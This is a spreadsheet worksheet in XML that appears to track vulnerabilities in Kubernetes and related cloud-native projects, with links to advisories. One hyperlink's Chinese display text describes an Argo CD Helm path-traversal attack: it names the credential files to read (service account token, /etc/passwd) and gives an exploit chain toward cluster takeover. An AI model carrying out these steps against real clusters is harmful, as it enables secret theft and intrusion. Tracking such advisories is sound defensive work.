      <c r="AB36" s="6">
        <v>1</v>
      </c>
      <c r="AC36" s="6"/>
      <c r="AD36" s="6"/>
      <c r="AE36" s="6" t="s">
        <v>1476</v>
      </c>
      <c r="AF36" s="6"/>
      <c r="AG36" s="5" t="s">
        <v>94</v>
      </c>
      <c r="AH36" s="5" t="s">
        <v>563</v>
      </c>
      <c r="AI36" s="5" t="s">
        <v>564</v>
      </c>
      <c r="AJ36" s="5" t="s">
        <v>565</v>
      </c>
      <c r="AK36" s="5" t="s">
        <v>564</v>
      </c>
      <c r="AL36" s="5" t="s">
        <v>1302</v>
      </c>
    </row>
    <row r="37" s="31" customFormat="1" ht="409.5" spans="1:38">
      <c r="A37" s="6" t="s">
        <v>804</v>
      </c>
      <c r="B37" s="6" t="s">
        <v>1305</v>
      </c>
      <c r="C37" s="31" t="s">
        <v>1311</v>
      </c>
      <c r="D37" s="31" t="s">
        <v>1306</v>
      </c>
      <c r="E37" s="31" t="s">
        <v>1307</v>
      </c>
      <c r="F37" s="31" t="s">
        <v>1308</v>
      </c>
      <c r="G37" s="6" t="s">
        <v>1309</v>
      </c>
      <c r="H37" s="31" t="s">
        <v>1310</v>
      </c>
      <c r="I37" s="6" t="s">
        <v>805</v>
      </c>
      <c r="J37" s="6" t="s">
        <v>808</v>
      </c>
      <c r="K37" s="15" t="s">
        <v>809</v>
      </c>
      <c r="L37" s="6" t="s">
        <v>709</v>
      </c>
      <c r="M37" s="6" t="s">
        <v>811</v>
      </c>
      <c r="N37" s="6" t="s">
        <v>70</v>
      </c>
      <c r="O37" s="6" t="s">
        <v>70</v>
      </c>
      <c r="P37" s="6" t="s">
        <v>1509</v>
      </c>
      <c r="Q37" s="6"/>
      <c r="R37" s="6" t="s">
        <v>1466</v>
      </c>
      <c r="S37" s="6">
        <v>1</v>
      </c>
      <c r="T37" s="6" t="s">
        <v>117</v>
      </c>
      <c r="U37" s="6" t="s">
        <v>1508</v>
      </c>
      <c r="V37" s="6" t="s">
        <v>405</v>
      </c>
      <c r="W37" s="6"/>
      <c r="X37" s="6"/>
      <c r="Y37" s="6" t="s">
        <v>122</v>
      </c>
      <c r="Z37" s="6"/>
      <c r="AA37" s="6" t="s">
        <v>84</v>
      </c>
      <c r="AB37" s="6">
        <v>1</v>
      </c>
      <c r="AC37" s="6"/>
      <c r="AD37" s="6"/>
      <c r="AE37" s="6" t="s">
        <v>1476</v>
      </c>
      <c r="AF37" s="6"/>
      <c r="AG37" s="5" t="s">
        <v>94</v>
      </c>
      <c r="AH37" s="5" t="s">
        <v>563</v>
      </c>
      <c r="AI37" s="5" t="s">
        <v>564</v>
      </c>
      <c r="AJ37" s="5" t="s">
        <v>565</v>
      </c>
      <c r="AK37" s="5" t="s">
        <v>84</v>
      </c>
      <c r="AL37" s="5" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="38" s="31" customFormat="1" ht="408" customHeight="1" spans="1:38">
      <c r="A38" s="6" t="s">
        <v>1510</v>
      </c>
      <c r="B38" s="6" t="s">
        <v>1313</v>
      </c>
      <c r="C38" s="31" t="s">
        <v>1319</v>
      </c>
      <c r="D38" s="31" t="s">
        <v>1314</v>
      </c>
      <c r="E38" s="31" t="s">
        <v>1315</v>
      </c>
      <c r="F38" s="31" t="s">
        <v>1316</v>
      </c>
      <c r="G38" s="6" t="s">
        <v>1317</v>
      </c>
      <c r="H38" s="31" t="s">
        <v>1318</v>
      </c>
      <c r="I38" s="6" t="s">
        <v>821</v>
      </c>
      <c r="J38" s="6" t="s">
        <v>824</v>
      </c>
      <c r="K38" s="15" t="s">
        <v>825</v>
      </c>
      <c r="L38" s="6" t="s">
        <v>709</v>
      </c>
      <c r="M38" s="6" t="s">
        <v>1320</v>
      </c>
      <c r="N38" s="6" t="s">
        <v>70</v>
      </c>
      <c r="O38" s="6" t="s">
        <v>829</v>
      </c>
      <c r="P38" s="6" t="s">
        <v>1511</v>
      </c>
      <c r="Q38" s="6" t="s">
        <v>1512</v>
      </c>
      <c r="R38" s="6" t="s">
        <v>1513</v>
      </c>
      <c r="S38" s="6">
        <v>2</v>
      </c>
      <c r="T38" s="6" t="s">
        <v>117</v>
      </c>
      <c r="U38" s="6" t="s">
        <v>1514</v>
      </c>
      <c r="V38" s="6" t="s">
        <v>405</v>
      </c>
      <c r="W38" s="6"/>
      <c r="X38" s="6"/>
      <c r="Y38" s="6" t="s">
        <v>1500</v>
      </c>
      <c r="Z38" s="6"/>
      <c r="AA38" s="6" t="s">
        <v>70</v>
      </c>
      <c r="AB38" s="6">
        <v>2</v>
      </c>
      <c r="AC38" s="6"/>
      <c r="AD38" s="6" t="s">
        <v>1475</v>
      </c>
      <c r="AE38" s="6" t="s">
        <v>1407</v>
      </c>
      <c r="AF38" s="6"/>
      <c r="AG38" s="5" t="s">
        <v>94</v>
      </c>
      <c r="AH38" s="5" t="s">
        <v>563</v>
      </c>
      <c r="AI38" s="5" t="s">
        <v>834</v>
      </c>
      <c r="AJ38" s="5"/>
      <c r="AK38" s="5" t="s">
        <v>835</v>
      </c>
      <c r="AL38" s="5" t="s">
        <v>836</v>
      </c>
    </row>
    <row r="39" s="31" customFormat="1" ht="303.75" spans="1:38">
      <c r="A39" s="6" t="s">
        <v>852</v>
      </c>
      <c r="B39" s="6" t="s">
        <v>852</v>
      </c>
      <c r="C39" s="31" t="s">
        <v>1515</v>
      </c>
      <c r="D39" s="31" t="s">
        <v>1324</v>
      </c>
      <c r="E39" s="31" t="s">
        <v>1325</v>
      </c>
      <c r="F39" s="31" t="s">
        <v>1326</v>
      </c>
      <c r="G39" s="5" t="s">
        <v>861</v>
      </c>
      <c r="H39" s="31" t="s">
        <v>1327</v>
      </c>
      <c r="I39" s="6" t="s">
        <v>853</v>
      </c>
      <c r="J39" s="6" t="s">
        <v>856</v>
      </c>
      <c r="K39" s="6" t="s">
        <v>857</v>
      </c>
      <c r="L39" s="6" t="s">
        <v>234</v>
      </c>
      <c r="M39" s="6" t="s">
        <v>859</v>
      </c>
      <c r="N39" s="6" t="s">
        <v>70</v>
      </c>
      <c r="O39" s="51" t="s">
        <v>84</v>
      </c>
      <c r="P39" s="6"/>
      <c r="Q39" s="6"/>
      <c r="R39" s="6"/>
      <c r="S39" s="6"/>
      <c r="T39" s="6" t="s">
        <v>862</v>
      </c>
      <c r="U39" s="6" t="s">
        <v>1439</v>
      </c>
      <c r="V39" s="6" t="s">
        <v>81</v>
      </c>
      <c r="W39" s="6"/>
      <c r="X39" s="5" t="s">
        <v>1440</v>
      </c>
      <c r="Y39" s="6" t="s">
        <v>1424</v>
      </c>
      <c r="Z39" s="6" t="s">
        <v>1516</v>
      </c>
      <c r="AA39" s="6" t="s">
        <v>70</v>
      </c>
      <c r="AB39" s="6">
        <v>1</v>
      </c>
      <c r="AC39" s="6"/>
      <c r="AD39" s="6" t="s">
        <v>1443</v>
      </c>
      <c r="AE39" s="6" t="s">
        <v>1476</v>
      </c>
      <c r="AF39" s="6"/>
      <c r="AG39" s="5"/>
      <c r="AH39" s="5"/>
      <c r="AI39" s="5"/>
      <c r="AJ39" s="5"/>
      <c r="AK39" s="5"/>
      <c r="AL39" s="5"/>
    </row>
    <row r="40" s="31" customFormat="1" ht="409.5" spans="1:38">
      <c r="A40" s="6" t="s">
        <v>865</v>
      </c>
      <c r="B40" s="6" t="s">
        <v>865</v>
      </c>
      <c r="C40" s="31" t="s">
        <v>1517</v>
      </c>
      <c r="D40" s="31" t="s">
        <v>1330</v>
      </c>
      <c r="E40" s="31" t="s">
        <v>1331</v>
      </c>
      <c r="F40" s="31" t="s">
        <v>1332</v>
      </c>
      <c r="G40" s="5" t="s">
        <v>1333</v>
      </c>
      <c r="H40" s="31" t="s">
        <v>1334</v>
      </c>
      <c r="I40" s="6" t="s">
        <v>866</v>
      </c>
      <c r="J40" s="6" t="s">
        <v>870</v>
      </c>
      <c r="K40" s="6" t="s">
        <v>871</v>
      </c>
      <c r="L40" s="6" t="s">
        <v>872</v>
      </c>
      <c r="M40" s="6" t="s">
        <v>1335</v>
      </c>
      <c r="N40" s="6" t="s">
        <v>875</v>
      </c>
      <c r="O40" s="51" t="s">
        <v>84</v>
      </c>
      <c r="P40" s="6"/>
      <c r="Q40" s="6"/>
      <c r="R40" s="6"/>
      <c r="S40" s="6"/>
      <c r="T40" s="6" t="s">
        <v>117</v>
      </c>
      <c r="U40" s="6" t="s">
        <v>1518</v>
      </c>
      <c r="V40" s="5" t="s">
        <v>405</v>
      </c>
      <c r="W40" s="5"/>
      <c r="X40" s="5"/>
      <c r="Y40" s="6" t="s">
        <v>122</v>
      </c>
      <c r="Z40" s="6" t="s">
        <v>1519</v>
      </c>
      <c r="AA40" s="6" t="s">
        <v>84</v>
      </c>
      <c r="AB40" s="6">
        <v>1</v>
      </c>
      <c r="AC40" s="6"/>
      <c r="AD40" s="6"/>
      <c r="AE40" s="6" t="s">
        <v>1476</v>
      </c>
      <c r="AF40" s="6"/>
      <c r="AG40" s="5"/>
      <c r="AH40" s="5"/>
      <c r="AI40" s="5"/>
      <c r="AJ40" s="5"/>
      <c r="AK40" s="5"/>
      <c r="AL40" s="5"/>
    </row>
    <row r="41" s="31" customFormat="1" ht="409.5" spans="1:38">
      <c r="A41" s="6" t="s">
        <v>878</v>
      </c>
      <c r="B41" s="6" t="s">
        <v>878</v>
      </c>
      <c r="C41" s="31" t="s">
        <v>1341</v>
      </c>
      <c r="D41" s="31" t="s">
        <v>1337</v>
      </c>
      <c r="E41" s="31" t="s">
        <v>1338</v>
      </c>
      <c r="F41" s="31" t="s">
        <v>1339</v>
      </c>
      <c r="G41" s="5" t="s">
        <v>887</v>
      </c>
      <c r="H41" s="31" t="s">
        <v>1340</v>
      </c>
      <c r="I41" s="6" t="s">
        <v>879</v>
      </c>
      <c r="J41" s="6" t="s">
        <v>1342</v>
      </c>
      <c r="K41" s="6" t="s">
        <v>884</v>
      </c>
      <c r="L41" s="5" t="s">
        <v>872</v>
      </c>
      <c r="M41" s="6" t="s">
        <v>886</v>
      </c>
      <c r="N41" s="6" t="s">
        <v>70</v>
      </c>
      <c r="O41" s="51" t="s">
        <v>84</v>
      </c>
      <c r="P41" s="6"/>
      <c r="Q41" s="6"/>
      <c r="R41" s="6"/>
      <c r="S41" s="6"/>
      <c r="T41" s="6" t="s">
        <v>117</v>
      </c>
      <c r="U41" s="6" t="s">
        <v>1520</v>
      </c>
      <c r="V41" s="5" t="s">
        <v>405</v>
      </c>
      <c r="W41" s="5"/>
      <c r="X41" s="5"/>
      <c r="Y41" s="6" t="s">
        <v>122</v>
      </c>
      <c r="Z41" s="6"/>
      <c r="AA41" s="6" t="s">
        <v>84</v>
      </c>
      <c r="AB41" s="6">
        <v>1</v>
      </c>
      <c r="AC41" s="6"/>
      <c r="AD41" s="6"/>
      <c r="AE41" s="6" t="s">
        <v>1504</v>
      </c>
      <c r="AF41" s="6"/>
      <c r="AG41" s="5"/>
      <c r="AH41" s="5"/>
      <c r="AI41" s="5"/>
      <c r="AJ41" s="5"/>
      <c r="AK41" s="5"/>
      <c r="AL41" s="5"/>
    </row>
    <row r="42" s="31" customFormat="1" ht="409.5" spans="1:38">
      <c r="A42" s="48" t="s">
        <v>890</v>
      </c>
      <c r="B42" s="6" t="s">
        <v>890</v>
      </c>
      <c r="C42" s="31" t="s">
        <v>1521</v>
      </c>
      <c r="D42" s="31" t="s">
        <v>1344</v>
      </c>
      <c r="E42" s="31" t="s">
        <v>1345</v>
      </c>
      <c r="F42" s="31" t="s">
        <v>1346</v>
      </c>
      <c r="G42" s="5" t="s">
        <v>900</v>
      </c>
      <c r="H42" s="31" t="s">
        <v>1522</v>
      </c>
      <c r="I42" s="6" t="s">
        <v>891</v>
      </c>
      <c r="J42" s="6" t="s">
        <v>894</v>
      </c>
      <c r="K42" s="15" t="s">
        <v>895</v>
      </c>
      <c r="L42" s="6" t="s">
        <v>896</v>
      </c>
      <c r="M42" s="6" t="s">
        <v>1348</v>
      </c>
      <c r="N42" s="6" t="s">
        <v>70</v>
      </c>
      <c r="O42" s="51" t="s">
        <v>70</v>
      </c>
      <c r="P42" s="6" t="s">
        <v>1523</v>
      </c>
      <c r="Q42" s="6"/>
      <c r="R42" s="6" t="s">
        <v>1524</v>
      </c>
      <c r="S42" s="6">
        <v>1</v>
      </c>
      <c r="T42" s="6" t="s">
        <v>117</v>
      </c>
      <c r="U42" s="6" t="s">
        <v>1525</v>
      </c>
      <c r="V42" s="5" t="s">
        <v>405</v>
      </c>
      <c r="W42" s="5"/>
      <c r="X42" s="5"/>
      <c r="Y42" s="6" t="s">
        <v>1500</v>
      </c>
      <c r="Z42" s="6" t="s">
        <v>1526</v>
      </c>
      <c r="AA42" s="6" t="s">
        <v>70</v>
      </c>
      <c r="AB42" s="6">
        <v>1</v>
      </c>
      <c r="AC42" s="6" t="s">
        <v>1527</v>
      </c>
      <c r="AD42" s="6" t="s">
        <v>1475</v>
      </c>
      <c r="AE42" s="6" t="s">
        <v>1436</v>
      </c>
      <c r="AF42" s="6"/>
      <c r="AG42" s="5"/>
      <c r="AH42" s="5"/>
      <c r="AI42" s="5"/>
      <c r="AJ42" s="5"/>
      <c r="AK42" s="5"/>
      <c r="AL42" s="5"/>
    </row>
    <row r="43" s="31" customFormat="1" ht="409.5" spans="1:38">
      <c r="A43" s="5" t="s">
        <v>934</v>
      </c>
      <c r="B43" s="5" t="s">
        <v>934</v>
      </c>
      <c r="C43" s="31" t="s">
        <v>1528</v>
      </c>
      <c r="D43" s="31" t="s">
        <v>1349</v>
      </c>
      <c r="E43" s="31" t="s">
        <v>1350</v>
      </c>
      <c r="F43" s="31" t="s">
        <v>1351</v>
      </c>
      <c r="G43" s="5" t="s">
        <v>943</v>
      </c>
      <c r="H43" s="31" t="s">
        <v>1352</v>
      </c>
      <c r="I43" s="5" t="s">
        <v>1353</v>
      </c>
      <c r="J43" s="5" t="s">
        <v>938</v>
      </c>
      <c r="K43" s="5" t="s">
        <v>939</v>
      </c>
      <c r="L43" s="5" t="s">
        <v>940</v>
      </c>
      <c r="M43" s="5" t="s">
        <v>942</v>
      </c>
      <c r="N43" s="5" t="s">
        <v>70</v>
      </c>
      <c r="O43" s="37" t="s">
        <v>70</v>
      </c>
      <c r="P43" s="5" t="s">
        <v>1529</v>
      </c>
      <c r="Q43" s="5"/>
      <c r="R43" s="5" t="s">
        <v>1530</v>
      </c>
      <c r="S43" s="5">
        <v>2</v>
      </c>
      <c r="T43" s="5" t="s">
        <v>117</v>
      </c>
      <c r="U43" s="5" t="s">
        <v>1531</v>
      </c>
      <c r="V43" s="5" t="s">
        <v>405</v>
      </c>
      <c r="W43" s="5"/>
      <c r="X43" s="5"/>
      <c r="Y43" s="5" t="s">
        <v>1500</v>
      </c>
      <c r="Z43" s="5"/>
      <c r="AA43" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AB43" s="5">
        <v>2</v>
      </c>
      <c r="AC43" s="5"/>
      <c r="AD43" s="5" t="s">
        <v>1475</v>
      </c>
      <c r="AE43" s="5" t="s">
        <v>1436</v>
      </c>
      <c r="AF43" s="5"/>
      <c r="AG43" s="11"/>
      <c r="AH43" s="11"/>
      <c r="AI43" s="11"/>
      <c r="AJ43" s="11"/>
      <c r="AK43" s="11"/>
      <c r="AL43" s="11"/>
    </row>
    <row r="44" s="31" customFormat="1" ht="409.5" spans="1:38">
      <c r="A44" s="6" t="s">
        <v>1354</v>
      </c>
      <c r="B44" s="32" t="s">
        <v>1355</v>
      </c>
      <c r="C44" s="31" t="s">
        <v>1359</v>
      </c>
      <c r="D44" s="31" t="s">
        <v>1356</v>
      </c>
      <c r="E44" s="31" t="s">
        <v>1357</v>
      </c>
      <c r="F44" s="31" t="s">
        <v>1358</v>
      </c>
      <c r="G44" s="32" t="s">
        <v>954</v>
      </c>
      <c r="H44" s="31"/>
      <c r="I44" s="5" t="s">
        <v>945</v>
      </c>
      <c r="J44" s="5" t="s">
        <v>948</v>
      </c>
      <c r="K44" s="6" t="s">
        <v>949</v>
      </c>
      <c r="L44" s="5" t="s">
        <v>950</v>
      </c>
      <c r="M44" s="5" t="s">
        <v>952</v>
      </c>
      <c r="N44" s="6" t="s">
        <v>953</v>
      </c>
      <c r="O44" s="37" t="s">
        <v>84</v>
      </c>
      <c r="P44" s="5"/>
      <c r="Q44" s="5"/>
      <c r="R44" s="5"/>
      <c r="S44" s="5"/>
      <c r="T44" s="5" t="s">
        <v>332</v>
      </c>
      <c r="U44" s="5" t="s">
        <v>1532</v>
      </c>
      <c r="V44" s="5" t="s">
        <v>405</v>
      </c>
      <c r="W44" s="5"/>
      <c r="X44" s="5"/>
      <c r="Y44" s="5" t="s">
        <v>122</v>
      </c>
      <c r="Z44" s="5"/>
      <c r="AA44" s="32" t="s">
        <v>70</v>
      </c>
      <c r="AB44" s="32">
        <v>1</v>
      </c>
      <c r="AC44" s="32"/>
      <c r="AD44" s="32" t="s">
        <v>1475</v>
      </c>
      <c r="AE44" s="32" t="s">
        <v>1436</v>
      </c>
      <c r="AF44" s="32"/>
      <c r="AG44" s="35"/>
      <c r="AH44" s="35"/>
      <c r="AI44" s="35"/>
      <c r="AJ44" s="35"/>
      <c r="AK44" s="35"/>
      <c r="AL44" s="35"/>
    </row>
    <row r="45" s="30" customFormat="1" ht="409.5" spans="1:39">
      <c r="A45" s="5" t="s">
        <v>956</v>
      </c>
      <c r="B45" s="30" t="s">
        <v>1360</v>
      </c>
      <c r="C45" s="30" t="s">
        <v>1533</v>
      </c>
      <c r="D45" s="30" t="s">
        <v>1361</v>
      </c>
      <c r="E45" s="30" t="s">
        <v>1362</v>
      </c>
      <c r="F45" s="30" t="s">
        <v>1363</v>
      </c>
      <c r="G45" s="5" t="s">
        <v>963</v>
      </c>
      <c r="H45" s="30" t="s">
        <v>1364</v>
      </c>
      <c r="I45" s="5" t="s">
        <v>957</v>
      </c>
      <c r="J45" s="5"/>
      <c r="K45" s="5" t="s">
        <v>960</v>
      </c>
      <c r="L45" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M45" s="5" t="s">
        <v>1366</v>
      </c>
      <c r="N45" s="5" t="s">
        <v>70</v>
      </c>
      <c r="O45" s="5" t="s">
        <v>84</v>
      </c>
      <c r="P45" s="5" t="s">
        <v>964</v>
      </c>
      <c r="Q45" s="5"/>
      <c r="R45" s="5"/>
      <c r="S45" s="5"/>
      <c r="T45" s="5" t="s">
        <v>147</v>
      </c>
      <c r="U45" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="V45" s="5" t="s">
        <v>81</v>
      </c>
      <c r="W45" s="5"/>
      <c r="X45" s="5" t="s">
        <v>82</v>
      </c>
      <c r="Y45" s="5" t="s">
        <v>1424</v>
      </c>
      <c r="Z45" s="5"/>
      <c r="AA45" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AB45" s="5">
        <v>1</v>
      </c>
      <c r="AC45" s="5"/>
      <c r="AD45" s="5" t="s">
        <v>1406</v>
      </c>
      <c r="AE45" s="5" t="s">
        <v>1407</v>
      </c>
      <c r="AF45" s="5" t="s">
        <v>1421</v>
      </c>
      <c r="AG45" s="5" t="s">
        <v>967</v>
      </c>
      <c r="AL45" s="5" t="s">
        <v>968</v>
      </c>
      <c r="AM45" s="30">
        <v>3</v>
      </c>
    </row>
    <row r="46" s="30" customFormat="1" ht="409.5" spans="1:39">
      <c r="A46" s="5" t="s">
        <v>974</v>
      </c>
      <c r="B46" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="C46" s="30" t="s">
        <v>1534</v>
      </c>
      <c r="D46" s="30" t="s">
        <v>1369</v>
      </c>
      <c r="E46" s="30" t="s">
        <v>1370</v>
      </c>
      <c r="F46" s="30" t="s">
        <v>1371</v>
      </c>
      <c r="G46" s="5" t="s">
        <v>1372</v>
      </c>
      <c r="H46" s="30" t="s">
        <v>1373</v>
      </c>
      <c r="I46" s="5" t="s">
        <v>957</v>
      </c>
      <c r="J46" s="14" t="s">
        <v>976</v>
      </c>
      <c r="K46" s="5" t="s">
        <v>977</v>
      </c>
      <c r="L46" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M46" s="5" t="s">
        <v>1366</v>
      </c>
      <c r="N46" s="5" t="s">
        <v>70</v>
      </c>
      <c r="O46" s="5" t="s">
        <v>84</v>
      </c>
      <c r="P46" s="5"/>
      <c r="Q46" s="5"/>
      <c r="R46" s="5"/>
      <c r="S46" s="5"/>
      <c r="T46" s="5" t="s">
        <v>979</v>
      </c>
      <c r="U46" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="V46" s="5" t="s">
        <v>81</v>
      </c>
      <c r="W46" s="5"/>
      <c r="X46" s="5" t="s">
        <v>82</v>
      </c>
      <c r="Y46" s="5" t="s">
        <v>1424</v>
      </c>
      <c r="Z46" s="5"/>
      <c r="AA46" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AB46" s="5">
        <v>1</v>
      </c>
      <c r="AC46" s="5"/>
      <c r="AD46" s="5" t="s">
        <v>1406</v>
      </c>
      <c r="AE46" s="5" t="s">
        <v>1407</v>
      </c>
      <c r="AF46" s="5" t="s">
        <v>1421</v>
      </c>
      <c r="AG46" s="5" t="s">
        <v>967</v>
      </c>
      <c r="AM46" s="30">
        <v>3</v>
      </c>
    </row>
    <row r="47" s="30" customFormat="1" ht="409.5" spans="1:39">
      <c r="A47" s="5" t="s">
        <v>985</v>
      </c>
      <c r="B47" s="5" t="s">
        <v>1375</v>
      </c>
      <c r="C47" s="30" t="s">
        <v>1535</v>
      </c>
      <c r="D47" s="30" t="s">
        <v>1376</v>
      </c>
      <c r="E47" s="30" t="s">
        <v>1377</v>
      </c>
      <c r="F47" s="30" t="s">
        <v>1378</v>
      </c>
      <c r="G47" s="5" t="s">
        <v>990</v>
      </c>
      <c r="H47" s="30" t="s">
        <v>1379</v>
      </c>
      <c r="I47" s="5" t="s">
        <v>957</v>
      </c>
      <c r="J47" s="14" t="s">
        <v>988</v>
      </c>
      <c r="K47" s="5" t="s">
        <v>989</v>
      </c>
      <c r="L47" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M47" s="5" t="s">
        <v>1366</v>
      </c>
      <c r="N47" s="5" t="s">
        <v>70</v>
      </c>
      <c r="O47" s="5" t="s">
        <v>84</v>
      </c>
      <c r="P47" s="5"/>
      <c r="Q47" s="5"/>
      <c r="R47" s="5"/>
      <c r="S47" s="5"/>
      <c r="T47" s="5" t="s">
        <v>147</v>
      </c>
      <c r="U47" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="V47" s="5" t="s">
        <v>81</v>
      </c>
      <c r="W47" s="5"/>
      <c r="X47" s="5" t="s">
        <v>82</v>
      </c>
      <c r="Y47" s="5" t="s">
        <v>1424</v>
      </c>
      <c r="Z47" s="5"/>
      <c r="AA47" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AB47" s="5">
        <v>1</v>
      </c>
      <c r="AC47" s="5"/>
      <c r="AD47" s="5" t="s">
        <v>1406</v>
      </c>
      <c r="AE47" s="5" t="s">
        <v>1407</v>
      </c>
      <c r="AF47" s="5" t="s">
        <v>1421</v>
      </c>
      <c r="AG47" s="5" t="s">
        <v>967</v>
      </c>
      <c r="AL47" s="5" t="s">
        <v>151</v>
      </c>
      <c r="AM47" s="30">
        <v>3</v>
      </c>
    </row>
    <row r="48" s="30" customFormat="1" ht="409.5" spans="1:39">
      <c r="A48" s="5" t="s">
        <v>999</v>
      </c>
      <c r="B48" s="5" t="s">
        <v>1381</v>
      </c>
      <c r="C48" s="30" t="s">
        <v>1536</v>
      </c>
      <c r="D48" s="30" t="s">
        <v>1382</v>
      </c>
      <c r="E48" s="30" t="s">
        <v>1383</v>
      </c>
      <c r="F48" s="30" t="s">
        <v>1384</v>
      </c>
      <c r="G48" s="5" t="s">
        <v>1385</v>
      </c>
      <c r="H48" s="30" t="s">
        <v>1386</v>
      </c>
      <c r="I48" s="5"/>
      <c r="J48" s="5" t="s">
        <v>1002</v>
      </c>
      <c r="K48" s="5" t="s">
        <v>1003</v>
      </c>
      <c r="L48" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M48" s="5" t="s">
        <v>1387</v>
      </c>
      <c r="N48" s="5" t="s">
        <v>70</v>
      </c>
      <c r="O48" s="5" t="s">
        <v>84</v>
      </c>
      <c r="P48" s="5"/>
      <c r="Q48" s="5"/>
      <c r="R48" s="5"/>
      <c r="S48" s="5"/>
      <c r="T48" s="5" t="s">
        <v>979</v>
      </c>
      <c r="U48" s="6" t="s">
        <v>1030</v>
      </c>
      <c r="V48" s="5" t="s">
        <v>81</v>
      </c>
      <c r="W48" s="5"/>
      <c r="X48" s="5" t="s">
        <v>82</v>
      </c>
      <c r="Y48" s="5" t="s">
        <v>1424</v>
      </c>
      <c r="Z48" s="5"/>
      <c r="AA48" s="5" t="s">
        <v>70</v>
      </c>
      <c r="AB48" s="5">
        <v>1</v>
      </c>
      <c r="AC48" s="5"/>
      <c r="AD48" s="5" t="s">
        <v>1406</v>
      </c>
      <c r="AE48" s="5" t="s">
        <v>1407</v>
      </c>
      <c r="AF48" s="5" t="s">
        <v>1421</v>
      </c>
      <c r="AG48" s="5" t="s">
        <v>967</v>
      </c>
      <c r="AL48" s="5" t="s">
        <v>1009</v>
      </c>
      <c r="AM48" s="30">
        <v>4</v>
      </c>
    </row>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="A1:AM48" etc:filterBottomFollowUsedRange="0">
    <extLst/>
  </autoFilter>
  <hyperlinks>
    <hyperlink ref="K9" r:id="rId1" display="&#10;nginx-ingress:&#10;k8s: https://github.com/kubernetes/kubernetes/issues/126811" tooltip="https://github.com/kubernetes/kubernetes/issues/126811"/>
    <hyperlink ref="K8" r:id="rId2" display="https://github.com/kubernetes/kubernetes/issues/126812" tooltip="https://github.com/kubernetes/kubernetes/issues/126812"/>
    <hyperlink ref="K7" r:id="rId3" display="https://github.com/kubernetes/kubernetes/issues/126813" tooltip="https://github.com/kubernetes/kubernetes/issues/126813"/>
    <hyperlink ref="K6" r:id="rId4" display="https://github.com/kubernetes/ingress-nginx/issues/10572" tooltip="https://github.com/kubernetes/ingress-nginx/issues/10572"/>
    <hyperlink ref="K10" r:id="rId5" display="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r" tooltip="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r"/>
    <hyperlink ref="K13" r:id="rId6" display="https://github.com/cri-o/cri-o/security/advisories/GHSA-6x2m-w449-qwx7"/>
    <hyperlink ref="K11" r:id="rId7" display="https://github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j"/>
    <hyperlink ref="J18" r:id="rId8" display="Patched versions&#10;0.55.1&#10;&#10;&#10;https://github.com/kubevirt/kubevirt/pull/8198&#10;https://github.com/kubevirt/kubevirt/pull/8268&#10;&#10;"/>
    <hyperlink ref="J19" r:id="rId9" display="kubevirt 0.30&#10;&#10;https://github.com/kubevirt/kubevirt/pull/3686"/>
    <hyperlink ref="K20" r:id="rId10" display="https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cmv8-6362-r5w9"/>
    <hyperlink ref="K33" r:id="rId11" display="https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7"/>
    <hyperlink ref="K16" r:id="rId12" display="https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww"/>
    <hyperlink ref="K17" r:id="rId13" display="https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc"/>
    <hyperlink ref="K27" r:id="rId14" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-h6h5-6fmq-rh28"/>
    <hyperlink ref="J28" r:id="rId15" display="2.6.1&#10;https://github.com/argoproj/argo-cd/pull/12320/commits/200c3c156e9c27c6c5b197a5be28315e9b802b12"/>
    <hyperlink ref="K28" r:id="rId16" display="https://github.com/argoproj/argo-cd/issues/12309&#10;&#10;https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw"/>
    <hyperlink ref="K25" r:id="rId17" display="https://github.com/argoproj/argo-events/security/advisories/GHSA-qpgx-64h2-gc3c&#10;&#10;https://github.com/argoproj/argo-events/issues/1947"/>
    <hyperlink ref="M26" r:id="rId18" display="https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/&#10;&#10;&#10; 1..敏感信息泄露&#10;​目标文件：&#10;Kubernetes Secrets（如/var/run/secrets/kubernetes.io/serviceaccount/token）；&#10;其他应用的明文配置文件（如数据库凭证）；&#10;系统敏感文件（如/etc/passwd）。&#10;​攻击步骤：&#10;提交包含恶意valueFiles路径的Helm Chart至仓库；&#10;Argo CD同步时触发helmTemplate逻辑；&#10;url.ParseRequestURI()误判路径为URI，跳过EnforceToCurrentRoot()检查；&#10;读取目标文件内容并解析为YAML参数，通过Argo CD API或UI泄露。&#10;2. ​横向移动与权限提升&#10;​场景延伸：&#10;窃取集群管理员Token，通过kubectl接管集群；&#10;读取其他应用的values.yaml，获取数据库连接字符串等敏感信息；&#10;利用泄露的SSH密钥访问内部系统。&#10;​利用链示例：&#10;mermaid&#10;graph TD&#10;    A[提交恶意Chart] --&gt; B[绕过路径检查]&#10;    B --&gt; C[读取ServiceAccount Token]&#10;    C --&gt; D[通过kubectl执行任意命令]&#10;    D --&gt; E[部署恶意Pod或窃取数据]&#10;3. ​供应链攻击&#10;​污染公共Helm仓库：&#10;攻击者上传包含恶意valueFiles的Chart至公共仓库（如Artifact Hub），诱导用户部署。&#10;​后果：&#10;所有使用该Chart的Argo CD实例自动同步后，敏感数据将泄露至攻击者控制的端点&#10;&#10;"/>
